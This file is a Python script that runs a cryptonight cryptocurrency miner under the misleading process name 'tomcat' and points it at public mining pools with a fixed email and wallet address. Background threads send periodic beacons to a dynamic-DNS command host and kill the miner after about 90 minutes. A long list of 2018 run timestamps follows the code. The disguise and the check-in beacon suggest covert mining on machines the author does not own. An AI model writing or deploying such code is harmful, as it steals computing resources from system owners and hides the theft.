import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:10.541152
#2018-02-17 16:33:04.235325
#2018-02-17 18:20:08.840153
#2018-02-17 20:08:05.904119
#2018-02-17 21:55:06.150453
#2018-02-17 23:40:06.009105
#2018-02-18 01:31:07.207237
#2018-02-18 03:17:04.396495
#2018-02-18 05:06:03.838988
#2018-02-18 06:58:03.827229
#2018-02-18 08:46:02.051991
#2018-02-18 10:33:05.422201
#2018-02-18 12:18:06.926379
#2018-02-18 14:04:07.107245
#2018-02-18 15:54:03.897198
#2018-02-18 17:44:04.252698
#2018-02-18 19:31:01.471587
#2018-02-18 21:16:03.571486
#2018-02-18 23:04:01.271301
#2018-02-19 00:50:07.736096
#2018-02-19 02:37:06.702042
#2018-02-19 04:23:05.445198
#2018-02-19 06:08:04.280358
#2018-02-19 07:56:06.518358
#2018-02-19 09:47:06.593022
#2018-02-19 11:35:03.596071
#2018-02-19 13:21:07.984495
#2018-02-19 15:08:07.401665
#2018-02-19 16:57:07.432928
#2018-02-19 18:46:04.916523
#2018-02-19 20:36:06.303252
#2018-02-19 22:22:06.370117
#2018-02-20 00:08:05.641964
#2018-02-20 01:54:06.437802
#2018-02-20 03:42:08.744605
#2018-02-20 05:29:07.205458
#2018-02-20 07:13:06.981514
#2018-02-20 08:58:07.544888
#2018-02-20 10:42:07.153495
#2018-02-20 12:28:04.537052
#2018-02-20 14:15:09.451972
#2018-02-20 16:00:06.047829
#2018-02-20 17:46:01.416568
#2018-02-20 19:37:08.059571
#2018-02-20 21:26:05.470661
#2018-02-20 23:10:10.639336
#2018-02-21 00:55:04.232233
#2018-02-21 02:41:06.693659
#2018-02-21 04:28:04.644757
#2018-02-21 06:17:04.468534
#2018-02-21 08:03:06.343540
#2018-02-21 09:48:08.854808
#2018-02-21 11:37:01.560708
#2018-02-21 13:25:08.189510
#2018-02-21 15:10:09.345737
#2018-02-21 16:59:06.756628
#2018-02-21 18:48:10.602733
#2018-02-21 20:42:04.581636
#2018-02-21 22:28:03.664671
#2018-02-22 00:17:06.731502
#2018-02-22 02:05:08.020436
#2018-02-22 03:51:02.199740
#2018-02-22 05:39:02.217827
#2018-02-22 07:24:07.304588
#2018-02-22 09:12:05.747994
#2018-02-22 10:59:07.784676
#2018-02-22 12:46:01.597601
#2018-02-22 14:31:09.655168
#2018-02-22 16:19:01.476105
#2018-02-22 18:07:07.225355
#2018-02-22 19:55:07.478716
#2018-02-22 21:44:01.644975
#2018-02-22 23:32:05.999888
#2018-02-23 01:19:06.796466
#2018-02-23 03:05:07.854154
#2018-02-23 04:53:03.675988
#2018-02-23 06:39:07.096094
#2018-02-23 08:27:08.026895
#2018-02-23 10:44:01.958331
#2018-02-23 12:41:01.279455
#2018-02-23 14:24:09.119203
#2018-02-23 16:15:07.125654
#2018-02-23 18:01:01.590683
#2018-02-23 19:45:09.749190
#2018-02-23 21:28:06.741816
#2018-02-23 23:17:05.167531
#2018-02-24 01:07:05.363622
#2018-02-24 02:57:04.127844
#2018-02-24 04:45:02.127946
#2018-02-24 06:29:04.556252
#2018-02-24 08:17:06.524975
#2018-02-24 10:02:07.975453
#2018-02-24 12:00:08.862439
#2018-02-24 13:48:03.987721
#2018-02-24 15:32:02.076065
#2018-02-24 17:24:05.509868
#2018-02-24 19:12:05.351115
#2018-02-24 21:00:05.334254
#2018-02-24 23:31:05.037972
#2018-02-25 03:38:01.194573
#2018-02-25 07:16:06.542321